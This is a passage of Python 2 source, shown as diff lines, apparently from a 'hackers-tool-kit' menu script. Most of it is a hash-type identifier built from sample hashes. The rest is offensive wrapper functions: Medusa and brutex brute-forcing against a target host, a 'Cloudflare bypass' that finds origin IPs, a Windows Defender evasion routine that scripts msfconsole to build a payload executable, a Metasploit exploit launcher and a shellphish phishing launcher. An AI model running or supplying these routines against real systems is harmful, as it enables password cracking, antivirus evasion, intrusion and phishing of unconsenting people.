Haval128HMAC(): - hs='3ce8b0ffd75bc240fc7d967729cd6637' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106165") - def MD2(): - hs='08bbef4754d98806c373f2cd7d9a43c4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106060") - def MD2HMAC(): - hs='4b61b72ead2b0eb0fa3b8a56556a6dca' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106120") - def MD4(): - hs='a2acde400e61410e79dacbdfc3413151' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106040") - def MD4HMAC(): - hs='6be20b66f2211fe937294c1c95d1cd4f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106100") - def MD5(): - hs='ae11fd697ec92c7c98de3fac23aba525' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106020") - def MD5HMAC(): - hs='d57e43d2c7e397bf788f66541d6fdef9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106080") - def MD5HMACWordpress(): - hs='3f47886719268dfa83468630948228f6' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106140") - def NTLM(): - hs='cc348bace876ea440a28ddaeb9fd3550' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106029") - def RAdminv2x(): - hs='baea31c728cbf0cd548476aa687add4b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106027") - def RipeMD128(): - hs='4985351cd74aff0abc5a75a0c8a54115' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106180") - def RipeMD128HMAC(): - hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106185") - def SNEFRU128(): - hs='4fb58702b617ac4f7ca87ec77b93da8a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106200") - def SNEFRU128HMAC(): - hs='59b2b9dcc7a9a7d089cecf1b83520350' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106205") - def Tiger128(): - hs='c086184486ec6388ff81ec9f23528727' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106220") - def Tiger128HMAC(): - hs='c87032009e7c4b2ea27eb6f99723454b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106225") - def md5passsalt(): - hs='5634cc3b922578434d6e9342ff5913f7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106240") - def md5saltmd5pass(): - hs='245c5763b95ba42d4b02d44bbcd916f1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106260") - def md5saltpass(): - hs='22cc5ce1a1ef747cd3fa06106c148dfa' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106280") - def md5saltpasssalt(): - hs='469e9cdcaff745460595a7a386c4db0c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106300") - def md5saltpassusername(): - hs='9ae20f88189f6e3a62711608ddb6f5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106320") - def md5saltmd5pass(): - hs='aca2a052962b2564027ee62933d2382f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106340") - def md5saltmd5passsalt(): - hs='de0237dc03a8efdf6552fbe7788b2fdd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106360") - def md5saltmd5passsalt(): - hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106380") - def md5saltmd5saltpass(): - hs='d8f3b3f004d387086aae24326b575b23' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106400") - def md5saltmd5md5passsalt(): - hs='81f181454e23319779b03d74d062b1a2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106420") - def md5username0pass(): - hs='e44a60f8f2106492ae16581c91edb3ba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106440") - def md5usernameLFpass(): - hs='654741780db415732eaee12b1b909119' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106460") - def md5usernamemd5passsalt(): - hs='954ac5505fd1843bbb97d1b2cda0b98f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106480") - def md5md5pass(): - hs='a96103d267d024583d5565436e52dfb3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106500") - def md5md5passsalt(): - hs='5848c73c2482d3c2c7b6af134ed8dd89' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106520") - def md5md5passmd5salt(): - hs='8dc71ef37197b2edba02d48c30217b32' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106540") - def md5md5saltpass(): - hs='9032fabd905e273b9ceb1e124631bd67' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106560") - def md5md5saltmd5pass(): - hs='8966f37dbb4aca377a71a9d3d09cd1ac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106580") - def md5md5usernamepasssalt(): - hs='4319a3befce729b34c3105dbc29d0c40' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106600") - def md5md5md5pass(): - hs='ea086739755920e732d0f4d8c1b6ad8d' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106620") - def md5md5md5md5pass(): - hs='02528c1f2ed8ac7d83fe76f3cf1c133f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106640") - def md5md5md5md5md5pass(): - hs='4548d2c062933dff53928fd4ae427fc0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106660") - def md5sha1pass(): - hs='cb4ebaaedfd536d965c452d9569a6b1e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106680") - def md5sha1md5pass(): - hs='099b8a59795e07c334a696a10c0ebce0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106700") - def md5sha1md5sha1pass(): - hs='06e4af76833da7cc138d90602ef80070' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106720") - def md5strtouppermd5pass(): - hs='519de146f1a658ab5e5e2aa9b7d2eec8' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106740") - - def LineageIIC4(): - hs='0x49a57f66bd3d5ba6abda5579c264a0e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: - jerar.append("107080") - def MD5phpBB3(): - hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: - jerar.append("107040") - def MD5Unix(): - hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: - jerar.append("107060") - def MD5Wordpress(): - hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: - jerar.append("107020") - - def MD5APR(): - hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: - jerar.append("108020") - - def Haval160(): - hs='a106e921284dd69dad06192a4411ec32fce83dbb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109100") - def Haval160HMAC(): - hs='29206f83edc1d6c3f680ff11276ec20642881243' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109200") - def MySQL5(): - hs='9bb2fb57063821c762cc009f7584ddae9da431ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109040") - def MySQL160bit(): - hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: - jerar.append("109060") - def RipeMD160(): - hs='dc65552812c66997ea7320ddfb51f5625d74721b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109120") - def RipeMD160HMAC(): - hs='ca28af47653b4f21e96c1235984cb50229331359' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109180") - def SHA1(): - hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109020") - def SHA1HMAC(): - hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109140") - def SHA1MaNGOS(): - hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109220") - def SHA1MaNGOS2(): - hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109240") - def Tiger160(): - hs='c086184486ec6388ff81ec9f235287270429b225' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109080") - def Tiger160HMAC(): - hs='6603161719da5e56e1866e4f61f79496334e6a10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109160") - def sha1passsalt(): - hs='f006a1863663c21c541c8d600355abfeeaadb5e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109260") - def sha1saltpass(): - hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109280") - def sha1saltmd5pass(): - hs='860465ede0625deebb4fbbedcb0db9dc65faec30' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109300") - def sha1saltmd5passsalt(): - hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109320") - def sha1saltsha1pass(): - hs='58714327f9407097c64032a2fd5bff3a260cb85f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109340") - def sha1saltsha1saltsha1pass(): - hs='cc600a2903130c945aa178396910135cc7f93c63' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109360") - def sha1usernamepass(): - hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109380") - def sha1usernamepasssalt(): - hs='00025111b3c4d0ac1635558ce2393f77e94770c5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109400") - def sha1md5pass(): - hs='fa960056c0dea57de94776d3759fb555a15cae87' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("1094202") - def sha1md5passsalt(): - hs='1dad2b71432d83312e61d25aeb627593295bcc9a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109440") - def sha1md5sha1pass(): - hs='8bceaeed74c17571c15cdb9494e992db3c263695' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109460") - def sha1sha1pass(): - hs='3109b810188fcde0900f9907d2ebcaa10277d10e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109480") - def sha1sha1passsalt(): - hs='780d43fa11693b61875321b6b54905ee488d7760' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109500") - def sha1sha1passsubstrpass03(): - hs='5ed6bc680b59c580db4a38df307bd4621759324e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109520") - def sha1sha1saltpass(): - hs='70506bac605485b4143ca114cbd4a3580d76a413' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109540") - def sha1sha1sha1pass(): - hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109560") - def sha1strtolowerusernamepass(): - hs='79f575543061e158c2da3799f999eb7c95261f07' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109580") - - def Haval192(): - hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110040") - def Haval192HMAC(): - hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110080") - def Tiger192(): - hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110020") - def Tiger192HMAC(): - hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110060") - - def MD5passsaltjoomla1(): - hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("112020") - - def SHA1Django(): - hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: - jerar.append("113020") - - def Haval224(): - hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114040") - def Haval224HMAC(): - hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114080") - def SHA224(): - hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114020") - def SHA224HMAC(): - hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114060") - - def SHA256(): - hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115020") - def SHA256HMAC(): - hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115120") - def Haval256(): - hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115040") - def Haval256HMAC(): - hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115140") - def GOSTR341194(): - hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115060") - def RipeMD256(): - hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115080") - def RipeMD256HMAC(): - hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115160") - def SNEFRU256(): - hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115100") - def SNEFRU256HMAC(): - hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115180") - def SHA256md5pass(): - hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115200") - def SHA256sha1pass(): - hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115220") - - def MD5passsaltjoomla2(): - hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("116020") - def SAM(): - hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: - jerar.append("116040") - - def SHA256Django(): - hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: - jerar.append("117020") - - def RipeMD320(): - hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118020") - def RipeMD320HMAC(): - hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118040") - - def SHA384(): - hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119020") - def SHA384HMAC(): - hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119040") - - def SHA256s(): - hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: - jerar.append("120020") - - def SHA384Django(): - hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: - print " [+] SHA-384(Django)" - jerar.append("121020") - - def SHA512(): - hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122020") - def SHA512HMAC(): - hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122060") - def Whirlpool(): - hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122040") - def WhirlpoolHMAC(): - hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122080") - - - print logo - while True: - jerar=[] - print """ - -------------------------------------------------------------------------""" - hash = raw_input(" HASH: ") - ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() - - if len(jerar)==0: - print "" - print " Not Found." - elif len(jerar)>2: - jerar.sort() - print "" - print "Possible Hashs:" - print "[+] ",algorithms[jerar[0]] - print "[+] ",algorithms[jerar[1]] - print "" - print "Least Possible Hashs:" - for a in range(int(len(jerar))-2): - print "[+] ",algorithms[jerar[a+2]] - else: - jerar.sort() - print "" - print "Possible Hashs:" - for a in range(len(jerar)): - print "[+] ",algorithms[jerar[a]] -#------------------# -#FIND HASH TYPE END# - - -#RESTART SCRIPT START# -#--------------------# -def restart(): - os.system("clear") - os.system("cd /root/hackers-tool-kit && python htk.py") -#------------------# -#RESTART SCRIPT END# - - -#MEDUSA AUTOMATED START# -#----------------------# -def medusa(): - k = raw_input("Target Host: ") - u = raw_input("User: ") - p = raw_input("Wordlist: ") - os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") - print "\n" - m = raw_input("Module: ") - n = raw_input("Port: ") - a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) - os.system(a) -#--------------------# -#MEDUSA AUTOMATED END# - - -#WAF DETECTER START# -#------------------# -def wafwoof(): - j = raw_input("Enter Target: ") - k = 'wafw00f {0}'.format(j) - os.system(k) -#----------------# -#WAF DETECTER END# - - -#CLOUDFLARE BYPASS START# -#-----------------------# -def cloud(): - - subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] - - print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") - - host = raw_input("Enter Target: ") - for sublist in subdomainlist: - try: - hosts = str(sublist) + "." + str(host) - showip = socket.gethostbyname(str(hosts)) - print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) - except: - pass - - print ( '\033[93m' + "Credit Goes To: tugrulbey.com") - print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") -#---------------------# -#CLOUDFLARE BYPASS END# - - -#BRUTEFORCE ALL SERVICES ON WEB START# -#------------------------------------# -def brutex(): - k = raw_input("Target: ") - p = raw_input("Port: ") - a = 'brutex {0} {1}'.format(k,p) - os.system(a) -#----------------------------------# -#BRUTEFORCE ALL SERVICES ON WEB END# - - -#METERPRETER HELP MENU START# -#---------------------------# -def methelp(): - os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") -#-------------------------# -#METERPRETER HELP MENU END# - - -#WINDOWS DEFENDER BYPASS START# -#-----------------------------# -def winbyp(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - pay = raw_input("Payload: ") - port = raw_input("Port: ") - name = raw_input("File Name: ") - os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') - os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) - os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') - os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) - os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) - os.system('echo "run\n" >> winbyp.rc') - os.system("service postgresql restart") - os.system('msfconsole -r winbyp.rc') - os.system('rm -rf winbyp.rc') -#---------------------------# -#WINDOWS DEFENDER BYPASS END# - - -#USE A EXPLOIT START# -#-------------------# -def exploit(): - os.system("cat /root/hackers-tool-kit/tools/exploits.txt") - print "\n" - f = raw_input("Select Exploit: ") - os.system('echo "use {0}\n" >> exploit.rc'.format(f)) - os.system('echo "show options\n" >> exploit.rc'.format(f)) - os.system("service postgresql restart") - os.system('msfconsole -r exploit.rc') - os.system('rm -rf exploit.rc') -#-----------------# -#USE A EXPLOIT END# - - -#PHISHING AUTOMATED START# -#------------------------# -def phish(): - os.system("bash /root/shellphish/shellphish.sh") -#----------------------# -#PHISHING AUTOMATED END# - - -#LIST 